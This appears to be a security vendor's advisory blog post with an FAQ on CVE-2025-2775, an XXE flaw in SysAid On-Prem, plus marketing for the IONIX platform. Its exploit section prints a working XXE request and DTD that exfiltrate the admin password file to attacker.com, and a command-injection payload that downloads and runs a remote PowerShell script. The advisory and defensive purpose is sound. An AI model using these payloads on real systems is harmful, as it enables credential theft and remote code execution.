Frequently Asked Questions

SysAid On-Prem XML External Entity Vulnerability (CVE-2025-2775)

What is CVE-2025-2775 and how does it affect SysAid On-Prem?

CVE-2025-2775 is an unauthenticated XML External Entity (XXE) vulnerability in SysAid On-Prem's /mdm/checkin, /mdm/serverurl, and /lshw endpoints. It allows attackers to exploit unsafe XML parsing, potentially leading to blind SSRF, reading arbitrary files, credential exfiltration, and, when chained with CVE-2025-2778, remote code execution as SYSTEM. The flaw is rated CVSS 9.3 (Critical) and maps to CWE-611. Read more.

Which versions of SysAid On-Prem are affected by CVE-2025-2775?

SysAid On-Prem versions 23.3.40 and earlier are vulnerable. The issue is patched in SysAid On-Prem 24.4.60, released March 3, 2025.

How can the CVE-2025-2775 vulnerability be exploited?

Attackers can send crafted XML to vulnerable endpoints, causing the server to fetch remote resources or read local files. Credentials can be exfiltrated and used with a post-auth OS command injection bug (CVE-2025-2778) for remote code execution. Example exploit details are provided in the IONIX blog.

What are the potential risks associated with CVE-2025-2775?

Risks include full ITSM takeover, remote code execution, credential harvesting, and compliance impact (GDPR, HIPAA, PCI violations). Attackers may gain admin access, tamper with tickets, steal data, and impersonate service-desk staff.

What mitigation steps should be taken to address CVE-2025-2775?

Mitigation steps include:

  1. Upgrade to SysAid On-Prem 24.4.60 or later.
  2. Restrict access to vulnerable endpoints via reverse proxy or WAF.
  3. Disable external entity resolution in custom XML parsers.
  4. Delete InitAccount.cmd, reset admin password, and review stored secrets.
  5. Monitor for indicators of compromise (IOCs).
  6. Use the IONIX Exposure Management Platform to validate patch status and endpoint exposure.

How can I check if my organization is impacted by CVE-2025-2775?

IONIX actively tracks this vulnerability and provides updated information in the Threat Center of the IONIX portal. Customers can view asset-specific impact and recommended actions. Access the Threat Center.

Where can I find more technical details and references about CVE-2025-2775?

References include the NVD entry for CVE-2025-2775, SysAid 24.4.60 release notes, WatchTowr technical write-up and PoC, and Arctic Wolf analysis bulletin. See the IONIX blog post for links.

IONIX Platform Features & Capabilities

What is the IONIX Exposure Management Platform?

The IONIX Exposure Management Platform is a cybersecurity solution that helps organizations discover, assess, prioritize, and remediate attack surface risks. It provides complete attack surface visibility, validates exploitable vulnerabilities, and enables security teams to focus on critical remediation activities. Learn more.

What are the key features of IONIX?

Key features include Attack Surface Discovery, Risk Assessment, Risk Prioritization, Risk Remediation, Threat Exposure Radar, ML-based Connective Intelligence, and comprehensive digital supply chain mapping. IONIX also offers streamlined remediation workflows and integrations with ticketing, SIEM, and SOAR solutions. See full feature list.

What integrations does IONIX support?

IONIX integrates with Jira, ServiceNow, Slack, Splunk, Microsoft Sentinel, Palo Alto Cortex/Demisto, AWS Control Tower, AWS PrivateLink, and pre-trained Amazon SageMaker Models. For a full list, visit IONIX Integrations.

Does IONIX offer an API for integrations?

Yes, IONIX provides an API that supports integrations with major platforms such as Jira, ServiceNow, Splunk, Cortex XSOAR, and more. Learn more.

What technical documentation is available for IONIX?

IONIX offers technical documentation, guides, datasheets, and case studies on its resources page. Explore resources.

Security & Compliance

What security and compliance certifications does IONIX have?

IONIX is SOC2 compliant and supports companies with NIS-2 and DORA compliance, ensuring robust security measures and regulatory alignment.

How does IONIX help with regulatory compliance?

IONIX assists organizations in meeting NIS-2 and DORA requirements by providing comprehensive attack surface management, risk assessment, and continuous monitoring, supporting robust compliance and security postures.

Use Cases & Customer Success

Who can benefit from using IONIX?

IONIX is designed for Information Security and Cybersecurity VPs, C-level executives, IT managers, and security managers across industries, including Fortune 500 companies. It is suitable for organizations in insurance, financial services, energy, critical infrastructure, IT, technology, and healthcare.

What problems does IONIX solve for its customers?

IONIX addresses challenges such as shadow IT, unauthorized projects, fragmented IT environments, lack of attacker-perspective visibility, and maintaining up-to-date inventories in dynamic environments. It helps organizations proactively manage security risks and improve operational efficiency.

Can you share specific case studies or customer success stories?

Yes. E.ON used IONIX to continuously discover and inventory internet-facing assets, improving risk management (read case study). Warner Music Group boosted operational efficiency and aligned security operations with business goals (read case study). Grand Canyon Education enhanced security by proactively discovering and remediating vulnerabilities (read case study).

Who are some of IONIX's customers?

IONIX's customers include Infosys, Warner Music Group, The Telegraph, E.ON, Grand Canyon Education, and a Fortune 500 Insurance Company. See more customers.

What business impact can customers expect from using IONIX?

Customers can expect improved risk management, operational efficiency, cost savings (reduced mean time to resolution), and enhanced security posture. IONIX provides actionable insights and one-click workflows to streamline security operations. Learn more.

Product Performance & Differentiation

How does IONIX perform compared to other attack surface management solutions?

IONIX earned top ratings for product innovation, security, functionality, and usability. It was named a leader in the Innovation and Product categories of the ASM Leadership Compass for completeness of vision and customer-oriented approach. See details.

Why should a customer choose IONIX over alternatives?

IONIX offers ML-based Connective Intelligence for better asset discovery, Threat Exposure Radar for prioritizing critical issues, comprehensive digital supply chain coverage, and streamlined remediation. It reduces noise, validates risks, and provides actionable insights for maximum risk reduction and operational efficiency. Learn more.

Implementation & Support

How long does it take to implement IONIX and how easy is it to start?

Initial deployment of IONIX takes about a week and requires only one person to implement and scan the entire network. Customers have access to onboarding resources such as guides, tutorials, webinars, and a dedicated Technical Support Team. Read more.

What training and technical support does IONIX provide?

IONIX offers onboarding resources including guides, tutorials, webinars, and a dedicated Technical Support Team to assist during implementation and adoption. Learn more.

What customer service and support is available after purchasing IONIX?

IONIX provides technical support and maintenance services during the subscription term, including troubleshooting, upgrades, and maintenance. Customers are assigned a dedicated account manager and benefit from regular review meetings. See terms.

Blog & Knowledge Resources

Where can I find the IONIX blog?

The IONIX blog offers articles and updates on cybersecurity, exposure management, and industry trends. Read the blog.

What kind of content does the IONIX blog provide?

The IONIX blog covers topics such as vulnerability management, continuous threat exposure management, and cybersecurity best practices. Key authors include Amit Sheps and Fara Hain.

Where can I find more information about the SysAid On-Prem XML External Entity Vulnerability (CVE-2025-2775)?

Detailed information about CVE-2025-2775 is available on the IONIX blog: Read the full post.

Go back to All Blog posts

Exploited! SysAid On-Prem XML External Entity Vulnerability (CVE-2025-2775)

Amit Sheps
Amit Sheps Director of Product Marketing LinkedIn
May 8, 2025
Exploited! Warning sign indicating a vulnerability: CVE-2025-2775, SYSAID on-prem XML external entity vulnerability.

SysAid has patched a critical XML External Entity (XXE) flaw that lets unauthenticated attackers turn a routine /mdm check-in request into full administrator compromise—and, when chained with a newly disclosed command-injection bug, into remote code execution (RCE). The vulnerability, tracked as CVE-2025-2775, affects all SysAid On-Prem deployments up to 23.3.40 and is now fixed in 24.4.60.

What is CVE-2025-2775 SysAid On-Prem XML External Entity Vulnerability?

CVE-2025-2775 is an unauthenticated XXE issue in the /mdm/checkin, /mdm/serverurl, and /lshw endpoints of SysAid On-Prem. The application parses attacker-supplied XML with an unsafe call to PropertyListParser.parse() (and related XMLBeans routines) without disabling external entity resolution. By embedding an external <!DOCTYPE> directive, an attacker can:

  • Force the SysAid server to fetch remote resources (blind SSRF).
  • Read arbitrary files on the host OS.
  • Exfiltrate credentials contained in the installation script InitAccount.cmd, which stores the administrator user name and plaintext password.
  • Chain those credentials with a post-auth OS-command injection bug (CVE-2025-2778) in the API_jsp component to execute commands as SYSTEM.

The flaw is rated CVSS 9.3 (Critical) and maps to CWE-611: Improper Restriction of XML External Entity Reference.

Affected versions

  • Vulnerable: SysAid On-Prem 23.3.40 and earlier
  • Patched: SysAid On-Prem 24.4.60 (released March 3 2025)

Exploiting the Vulnerability

1. Triggering XXE

A minimal proof-of-concept sends a malicious plist to /mdm/checkin:

POST /mdm/checkin HTTP/1.1

Host: victim.example.com

Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE x [

 <!ENTITY % d SYSTEM "http://attacker.com/evil.dtd">

 %d;

]>

<plist>&send;</plist>

evil.dtd might embed:

<!ENTITY % file SYSTEM "file:///C:/Program Files/SysAidServer/logs/InitAccount.cmd">
<!ENTITY % send "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?d=%file;'>">
%send;

The server silently requests InitAccount.cmd, leaking the admin password to the attacker.

2. From Admin Password to RCE

With the harvested admin credentials, the attacker logs in and abuses the javaLocation parameter of the updateApiSettings form. Because that value is later concatenated into a shell script without sanitisation, a payload such as:

; powershell -c "Invoke-WebRequest http://attacker.com/shell.ps1 -OutFile C:\windows\temp\s.ps1; C:\windows\temp\s.ps1" ;

Yields command execution as the SysAid Windows service account (SYSTEM by default).

Potential Risks

  • Full ITSM takeover – Attackers gain SysAid admin access, allowing ticket tampering, data theft, and impersonation of service-desk staff.
  • Remote code execution – Chaining with CVE-2025-2778 lets attackers run arbitrary OS commands, install backdoors, deploy ransomware, or pivot into the internal network.
  • Credential harvesting – The plaintext admin password often re-used elsewhere becomes an instant lateral-movement accelerator.
  • Compliance impact – Exposure of ticket data (often containing PII and infrastructure details) can trigger GDPR, HIPAA, or PCI violations.

Mitigation Steps

  1. Upgrade immediately – Install SysAid On-Prem 24.4.60 or later.
  2. Remove internet exposure – Until patched, restrict access to /mdm/, /lshw, and API.jsp via reverse proxy or WAF.
  3. Harden XML parsing – Disable external entity resolution in any custom XML parsers.
  4. Rotate credentials – Delete InitAccount.cmd, reset the SysAid admin password, and review stored secrets.
  5. Monitor for IOCs – Look for outbound DTD requests, suspicious cmd.exe children of Tomcat, or rogue .ps1 files.
  6. Validate continuously – Use the IONIX Exposure Management Platform to confirm the patched version is running and no pre-auth XXE endpoints remain externally reachable.

Am I Impacted by CVE-2025-2775?

IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.

IONIX customers will see updated information on their specific assets in the Threat Center of the IONIX portal.

References

  • NVD entry for CVE-2025-2775
  • SysAid 24.4.60 release notes (security fixes)
  • WatchTowr technical write-up and PoC
  • Arctic Wolf analysis bulletin


WATCH A SHORT IONIX DEMO

See how easy it is to implement a CTEM program with IONIX. Find and fix exploits fast.

THE LATEST FROM IONIX

Tal Zamir
September 21, 2025
CVE-2025-10035 Critical Remote Code Execution in Fortra GoAnywhere MFT
Learn more
Tal Zamir
September 17, 2025
How IONIX Protects You in the AI Gold Rush
Learn more
Tal Zamir
September 10, 2025
CVE-2025-42944 — Insecure Deserialization in SAP NetWeaver
Learn more